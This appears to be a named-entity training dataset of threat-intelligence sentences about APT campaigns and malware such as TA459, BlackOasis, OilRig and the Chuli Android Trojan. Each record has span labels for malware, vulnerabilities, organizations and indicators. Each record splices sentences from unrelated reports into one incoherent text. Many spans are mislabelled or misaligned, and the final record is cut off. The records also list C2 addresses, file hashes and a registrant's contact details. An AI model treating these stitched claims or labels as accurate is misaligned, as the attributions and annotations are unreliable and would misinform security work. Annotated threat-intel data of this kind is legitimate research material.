This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers .", "spans": [{"start": 151, "end": 176, "label": "Malware"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 237, "end": 249, "label": "System"}, {"start": 281, "end": 307, "label": "System"}, {"start": 310, "end": 313, "label": "System"}, {"start": 330, "end": 339, "label": "Organization"}, {"start": 374, "end": 380, "label": "System"}, {"start": 417, "end": 424, "label": "Vulnerability"}, {"start": 454, "end": 462, "label": "Malware"}]} {"text": "It is important to note that the data won \u2019 t be uploaded to C & C server automatically . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": [{"start": 174, "end": 199, "label": "Malware"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 260, "end": 272, "label": "System"}, {"start": 304, "end": 330, "label": "System"}, {"start": 333, "end": 336, "label": "System"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 378, "end": 386, "label": "Vulnerability"}, {"start": 387, "end": 394, "label": "Vulnerability"}]} {"text": "The Trojan waits for incoming SMS messages ( the \u201c alarmReceiver.class \u201d ) and checks whether these messages contain one of the following commands : \u201c sms \u201d , \u201c contact \u201d , \u201c location \u201d , \u201c other \u201d . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP .", "spans": [{"start": 51, "end": 70, "label": "Indicator"}, {"start": 286, "end": 299, "label": "Malware"}, {"start": 319, "end": 358, "label": "Vulnerability"}, {"start": 361, "end": 374, "label": "Vulnerability"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 417, "end": 426, "label": "Organization"}, {"start": 474, "end": 494, "label": "Organization"}]} {"text": "If one these commands is found , then the malware will encode the stolen data with Base64 and upload it to the command and control server . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . 
This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific LOC of Europe .", "spans": [{"start": 140, "end": 147, "label": "Organization"}, {"start": 196, "end": 199, "label": "Organization"}, {"start": 254, "end": 271, "label": "Vulnerability"}, {"start": 324, "end": 339, "label": "Organization"}, {"start": 353, "end": 363, "label": "Organization"}, {"start": 368, "end": 377, "label": "Organization"}]} {"text": "The C2 URL is : hxxp : //64.78.161.133/ * victims \u2019 s_cell_phone_number * /process.php In addition to this , the malware also reports to another script , \u201c hxxp : //64.78.161.33/android.php \u201d . TG-3390 actors have used Java exploits in their SWCs . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": [{"start": 16, "end": 86, "label": "Indicator"}, {"start": 156, "end": 189, "label": "Indicator"}, {"start": 194, "end": 201, "label": "Organization"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 242, "end": 246, "label": "System"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 365, "end": 380, "label": "Organization"}, {"start": 414, "end": 434, "label": "Organization"}]} {"text": "First , it will get the \u201c nativenumber \u201d variable from the \u201c telmark \u201d value of \u201c AndroidManifest.xml \u201d . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . 
In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns .", "spans": [{"start": 82, "end": 101, "label": "System"}, {"start": 122, "end": 129, "label": "Organization"}, {"start": 144, "end": 157, "label": "Vulnerability"}, {"start": 225, "end": 245, "label": "System"}, {"start": 252, "end": 265, "label": "Vulnerability"}, {"start": 287, "end": 292, "label": "System"}, {"start": 427, "end": 437, "label": "Organization"}, {"start": 442, "end": 451, "label": "Organization"}]} {"text": "This is hardcoded and equals \u201c phone \u201d . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 .", "spans": [{"start": 90, "end": 103, "label": "Vulnerability"}, {"start": 171, "end": 191, "label": "System"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 233, "end": 238, "label": "System"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 397, "end": 407, "label": "Organization"}]} {"text": "Then , it will add the result of the public method localDate.getTime ( ) , which simply gets the current date . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks .", "spans": []} {"text": "An example of the string which is sent to the command-and-control would be \u201c phone 26.03.2013 \u201d . 
Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": [{"start": 163, "end": 177, "label": "Vulnerability"}, {"start": 180, "end": 212, "label": "System"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 374, "end": 387, "label": "Vulnerability"}, {"start": 388, "end": 395, "label": "Vulnerability"}, {"start": 406, "end": 416, "label": "Organization"}]} {"text": "It is interesting that the attackers used Java Base64 library developed by Sauron Software . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package .", "spans": [{"start": 75, "end": 90, "label": "Organization"}, {"start": 141, "end": 171, "label": "Vulnerability"}, {"start": 174, "end": 188, "label": "Vulnerability"}, {"start": 193, "end": 202, "label": "Organization"}, {"start": 231, "end": 238, "label": "System"}, {"start": 251, "end": 259, "label": "Malware"}, {"start": 298, "end": 307, "label": "Organization"}]} {"text": "This software is free and distributed under LGPL license . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . 
In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": [{"start": 62, "end": 86, "label": "Vulnerability"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 244, "end": 257, "label": "Vulnerability"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 370, "end": 385, "label": "Organization"}, {"start": 388, "end": 398, "label": "Organization"}, {"start": 403, "end": 412, "label": "Organization"}, {"start": 471, "end": 478, "label": "Vulnerability"}, {"start": 479, "end": 486, "label": "Vulnerability"}]} {"text": "Also , command communications with the malware are parsed with a function named \u201c chuli ( ) \u201d prior to POSTing stolen data to the command-and-control server . Execute a command through exploits for CVE-2017-11882 . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 198, "end": 212, "label": "Vulnerability"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 331, "end": 349, "label": "System"}, {"start": 350, "end": 358, "label": "Vulnerability"}, {"start": 375, "end": 388, "label": "Vulnerability"}, {"start": 435, "end": 441, "label": "Malware"}]} {"text": "It appears that the attackers are somewhat familiar with the language and mountain-trekking culture of the targets \u2013 the meaning of \u201c chuli \u201d is \u201c summit \u201d : The command-and-control server and parameters can be easily seen in the decompiled source code : Command and control server interaction code Throughout the code , the attackers log all important actions , 
which include various messages in Chinese . Execute a command through exploits for CVE-2018-0802 . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group \u2014 which goes by other names , including FinFisher and Lench IT Solutions .", "spans": [{"start": 446, "end": 459, "label": "Vulnerability"}, {"start": 462, "end": 468, "label": "Malware"}, {"start": 512, "end": 520, "label": "Organization"}, {"start": 627, "end": 638, "label": "Organization"}, {"start": 679, "end": 688, "label": "Organization"}]} {"text": "This was probably done for debugging purposes , indicating the malware may be an early prototype version . The document attached to this e-mail exploits CVE-2012-0158 . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China .", "spans": [{"start": 137, "end": 152, "label": "Vulnerability"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 183, "end": 193, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}]} {"text": "Some actions include ( with rough translations ) : The command-and-control server The command-and-control server is located at IP 64.78.161.133 . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . BlackOasis in recent months sent a wave of phishing emails .", "spans": [{"start": 130, "end": 143, "label": "Indicator"}, {"start": 146, "end": 160, "label": "Organization"}, {"start": 186, "end": 199, "label": "Vulnerability"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 282, "end": 288, "label": "System"}]} {"text": "This IP is located in Los Angeles , U.S.A. , at a hosting company named \u201c Emagine Concept Inc \u201d . 
The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data Exfiltration .", "spans": [{"start": 74, "end": 93, "label": "Organization"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 195, "end": 208, "label": "Vulnerability"}, {"start": 264, "end": 294, "label": "Vulnerability"}, {"start": 339, "end": 349, "label": "Organization"}]} {"text": "Interestingly , there is a domain which used to point there , \u201c DlmDocumentsExchange.com \u201d . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": [{"start": 64, "end": 88, "label": "Indicator"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 150, "end": 161, "label": "Vulnerability"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 231, "end": 240, "label": "Organization"}, {"start": 280, "end": 295, "label": "Organization"}, {"start": 354, "end": 362, "label": "Organization"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 390, "end": 399, "label": "Organization"}]} {"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. 
Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000 While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": [{"start": 83, "end": 146, "label": "Organization"}, {"start": 161, "end": 185, "label": "Indicator"}, {"start": 374, "end": 400, "label": "Indicator"}, {"start": 403, "end": 426, "label": "Indicator"}, {"start": 542, "end": 555, "label": "Vulnerability"}, {"start": 556, "end": 575, "label": "Vulnerability"}, {"start": 594, "end": 604, "label": "Organization"}, {"start": 637, "end": 646, "label": "Organization"}, {"start": 672, "end": 680, "label": "Vulnerability"}, {"start": 681, "end": 688, "label": "Vulnerability"}, {"start": 697, "end": 707, "label": "Organization"}]} {"text": "CN Tel . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 59, "end": 76, "label": "Vulnerability"}, {"start": 147, "end": 157, "label": "Organization"}]} {"text": "+86.01078456689 Fax . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . 
Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": [{"start": 130, "end": 149, "label": "Vulnerability"}, {"start": 152, "end": 165, "label": "Vulnerability"}, {"start": 229, "end": 244, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 324, "end": 334, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}]} {"text": "+86.01078456689 The command-and-control server is hosting an index page which also serves an APK file : The referenced \u201c Document.apk \u201d is 333583 bytes in size , MD5 : c4c4077e9449147d754afd972e247efc . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests .", "spans": [{"start": 121, "end": 133, "label": "Indicator"}, {"start": 168, "end": 200, "label": "Indicator"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 376, "end": 386, "label": "Organization"}, {"start": 488, "end": 500, "label": "Organization"}]} {"text": "It has the same functionality as the one described above but contains different text . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . 
Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": [{"start": 87, "end": 100, "label": "Organization"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 199, "end": 212, "label": "Vulnerability"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 298, "end": 308, "label": "Organization"}]} {"text": "The new text ( in Chinese , about relations between China , Japan and the disputed \u201c Senkaku Islands / Diaoyudao Islands / Diaoyutai Islands \u201d ) is shown to the victims and reads as following : When opened in a browser , this is what the command-and-control index page looks like : The text on the top means \u201c Title Title Title \u201d in Chinese , while the other strings appear to be random characters typed from the keyboard . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ACTs : economically ; from a national security perspective ; or due to established policy agreements .", "spans": [{"start": 431, "end": 439, "label": "Malware"}, {"start": 488, "end": 501, "label": "Vulnerability"}, {"start": 504, "end": 517, "label": "Vulnerability"}, {"start": 521, "end": 534, "label": "Vulnerability"}, {"start": 625, "end": 634, "label": "Organization"}]} {"text": "Interestingly , the command and control server includes a publicly accessible interface to work with the victims : Some of the commands with rough translations : The command-and-control server is running Windows Server 2003 and has been configured for Chinese language : This , together with the logs , is a strong indicator that the attackers are Chinese-speaking . Moreover , they used the same exploit kit Niteris as that in the Corkow case . 
The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent .", "spans": [{"start": 204, "end": 218, "label": "System"}, {"start": 405, "end": 416, "label": "Vulnerability"}, {"start": 432, "end": 438, "label": "System"}, {"start": 478, "end": 484, "label": "Organization"}, {"start": 525, "end": 534, "label": "Organization"}]} {"text": "Conclusions Every day , there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": [{"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 232, "end": 250, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 303, "end": 310, "label": "System"}, {"start": 347, "end": 356, "label": "Organization"}, {"start": 403, "end": 430, "label": "Malware"}, {"start": 433, "end": 437, "label": "Malware"}, {"start": 562, "end": 573, "label": "Organization"}]} {"text": "The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158 , CVE-2010-3333 and CVE-2009-3129 . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . 
Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": [{"start": 34, "end": 41, "label": "System"}, {"start": 59, "end": 63, "label": "System"}, {"start": 115, "end": 128, "label": "Vulnerability"}, {"start": 131, "end": 144, "label": "Vulnerability"}, {"start": 149, "end": 162, "label": "Vulnerability"}, {"start": 169, "end": 184, "label": "System"}, {"start": 197, "end": 212, "label": "Vulnerability"}, {"start": 255, "end": 266, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}, {"start": 293, "end": 305, "label": "Organization"}, {"start": 331, "end": 349, "label": "Organization"}, {"start": 392, "end": 401, "label": "Organization"}, {"start": 402, "end": 409, "label": "System"}, {"start": 446, "end": 455, "label": "Organization"}, {"start": 502, "end": 529, "label": "Malware"}, {"start": 532, "end": 536, "label": "Malware"}, {"start": 661, "end": 672, "label": "Organization"}]} {"text": "In this case , the attackers hacked a Tibetan activist \u2019 s account and used it to attack Uyghur activists . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . 
We have identified the tools , techniques , and network activities used in these continuing attacks\u2014which we have dubbed Night Dragon\u2014as originating primarily in China .", "spans": [{"start": 148, "end": 163, "label": "System"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 247, "end": 262, "label": "Vulnerability"}, {"start": 358, "end": 367, "label": "Organization"}, {"start": 491, "end": 506, "label": "Organization"}]} {"text": "It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 128, "end": 137, "label": "Organization"}, {"start": 307, "end": 320, "label": "Vulnerability"}, {"start": 325, "end": 339, "label": "Vulnerability"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 400, "end": 403, "label": "System"}, {"start": 536, "end": 539, "label": "Organization"}, {"start": 542, "end": 545, "label": "Organization"}, {"start": 552, "end": 575, "label": "Organization"}, {"start": 605, "end": 615, "label": "Organization"}]} {"text": "This technique reminds us of a combination between ages old war strategies \u201c Divide et impera \u201d and \u201c By way of deception \u201d . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 135, "end": 144, "label": "Organization"}, {"start": 171, "end": 180, "label": "Malware"}, {"start": 192, "end": 205, "label": "Vulnerability"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 266, "end": 269, "label": "System"}, {"start": 402, "end": 405, "label": "Organization"}, {"start": 408, "end": 411, "label": "Organization"}, {"start": 418, "end": 441, "label": "Organization"}, {"start": 471, "end": 481, "label": "Organization"}]} {"text": "Until now , we haven \u2019 t seen targeted attacks against mobile phones , although we \u2019 ve seen indications that these were in development . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker .", "spans": [{"start": 138, "end": 148, "label": "System"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 261, "end": 275, "label": "Vulnerability"}, {"start": 320, "end": 332, "label": "Organization"}, {"start": 416, "end": 425, "label": "Malware"}, {"start": 491, "end": 499, "label": "Organization"}]} {"text": "The current attack took advantage of the compromise of a high-profile Tibetan activist . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . 
While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry .", "spans": [{"start": 93, "end": 108, "label": "System"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 233, "end": 246, "label": "Organization"}]} {"text": "It is perhaps the first in a new wave of targeted attacks aimed at Android users . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums .", "spans": [{"start": 67, "end": 74, "label": "System"}, {"start": 110, "end": 123, "label": "Vulnerability"}, {"start": 154, "end": 170, "label": "System"}, {"start": 173, "end": 176, "label": "Malware"}, {"start": 306, "end": 315, "label": "Malware"}, {"start": 336, "end": 345, "label": "Organization"}]} {"text": "So far , the attackers relied entirely on social engineering to infect the targets . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 .", "spans": [{"start": 112, "end": 130, "label": "Vulnerability"}, {"start": 152, "end": 164, "label": "Vulnerability"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 395, "end": 402, "label": "Organization"}]} {"text": "History has shown us that , in time , these attacks will use zero-day vulnerabilities , exploits or a combination of techniques . 
Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection .", "spans": [{"start": 61, "end": 85, "label": "Vulnerability"}, {"start": 175, "end": 190, "label": "Vulnerability"}, {"start": 233, "end": 238, "label": "Organization"}, {"start": 384, "end": 390, "label": "Organization"}, {"start": 421, "end": 449, "label": "Malware"}]} {"text": "For now , the best protection is to avoid any APK attachments that arrive on mobile phones via e-mail . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle .", "spans": [{"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 256, "end": 273, "label": "Malware"}, {"start": 311, "end": 323, "label": "Organization"}]} {"text": "We detect the malware used in this attack as \u201c Backdoor.AndroidOS.Chuli.a \u201d . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . 
On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents .", "spans": [{"start": 47, "end": 73, "label": "Malware"}, {"start": 123, "end": 135, "label": "Organization"}, {"start": 175, "end": 190, "label": "Organization"}, {"start": 226, "end": 233, "label": "Organization"}, {"start": 263, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 333, "end": 338, "label": "Organization"}, {"start": 388, "end": 416, "label": "Malware"}]} {"text": "MD5s : c4c4077e9449147d754afd972e247efc Document.apk 0b8806b38b52bebfe39ff585639e2ea2 WUC \u2019 s Conference.apk Triada : organized crime on Android Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and uses several clever methods to become almost invisible March 3 , 2016 You know how armies typically move : first come the scouts to make sure everything is ok. Then the heavy troops The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . 
The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection .", "spans": [{"start": 7, "end": 39, "label": "Indicator"}, {"start": 40, "end": 52, "label": "Indicator"}, {"start": 53, "end": 85, "label": "Indicator"}, {"start": 94, "end": 108, "label": "Indicator"}, {"start": 109, "end": 115, "label": "Malware"}, {"start": 137, "end": 144, "label": "System"}, {"start": 145, "end": 151, "label": "Malware"}, {"start": 446, "end": 468, "label": "System"}, {"start": 519, "end": 526, "label": "Organization"}, {"start": 549, "end": 565, "label": "Vulnerability"}, {"start": 568, "end": 581, "label": "Vulnerability"}, {"start": 607, "end": 612, "label": "Organization"}]} {"text": "arrive ; at least that was how it used to be before the age of cyber wars . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user .", "spans": [{"start": 201, "end": 217, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 329, "end": 334, "label": "Organization"}]} {"text": "It turns out , that Trojans behave quite the same way . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . 
Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": [{"start": 125, "end": 141, "label": "System"}, {"start": 158, "end": 171, "label": "System"}, {"start": 208, "end": 224, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 308, "end": 314, "label": "Organization"}, {"start": 322, "end": 350, "label": "Indicator"}]} {"text": "There are a lot of small Trojans for Android capable of leveraging access privileges , in other words \u2014 gaining root access . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective .", "spans": [{"start": 37, "end": 44, "label": "System"}, {"start": 178, "end": 191, "label": "Vulnerability"}, {"start": 243, "end": 249, "label": "Organization"}, {"start": 290, "end": 308, "label": "Malware"}]} {"text": "Our malware analysts Nikita Buchka and Mikhail Kuzin can easily name 11 families of such Trojans . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 .", "spans": [{"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 176, "end": 194, "label": "System"}, {"start": 218, "end": 224, "label": "Organization"}]} {"text": "Most of them are almost harmless \u2014 all they did until recently was injecting tons of ads and downloading others of their kind . 
Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office .", "spans": [{"start": 128, "end": 135, "label": "Organization"}, {"start": 159, "end": 170, "label": "System"}, {"start": 192, "end": 205, "label": "Vulnerability"}, {"start": 217, "end": 235, "label": "System"}, {"start": 275, "end": 289, "label": "Malware"}, {"start": 325, "end": 335, "label": "Organization"}, {"start": 346, "end": 366, "label": "Organization"}, {"start": 377, "end": 396, "label": "Organization"}]} {"text": "If you want to know more about them \u2014 our researchers have an article about them on Securelist . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate .", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 121, "end": 132, "label": "System"}, {"start": 154, "end": 167, "label": "Vulnerability"}, {"start": 179, "end": 197, "label": "System"}, {"start": 286, "end": 317, "label": "Malware"}]} {"text": "If you follow the military analogy \u2014 those are the scouts . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" .", "spans": [{"start": 126, "end": 139, "label": "Vulnerability"}, {"start": 155, "end": 173, "label": "System"}, {"start": 195, "end": 203, "label": "Organization"}, {"start": 244, "end": 257, "label": "Organization"}, {"start": 288, "end": 295, "label": "Organization"}, {"start": 300, "end": 306, "label": "Organization"}, {"start": 332, "end": 349, "label": "Malware"}, {"start": 354, "end": 369, "label": "Malware"}]} {"text": "As you probably have noticed , gaining root access gives them the capability to download and install applications \u2014 that \u2019 s the reason why once one of them get into the system , in a few minutes there are all the others . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia .", "spans": [{"start": 257, "end": 268, "label": "System"}, {"start": 290, "end": 303, "label": "Vulnerability"}, {"start": 319, "end": 337, "label": 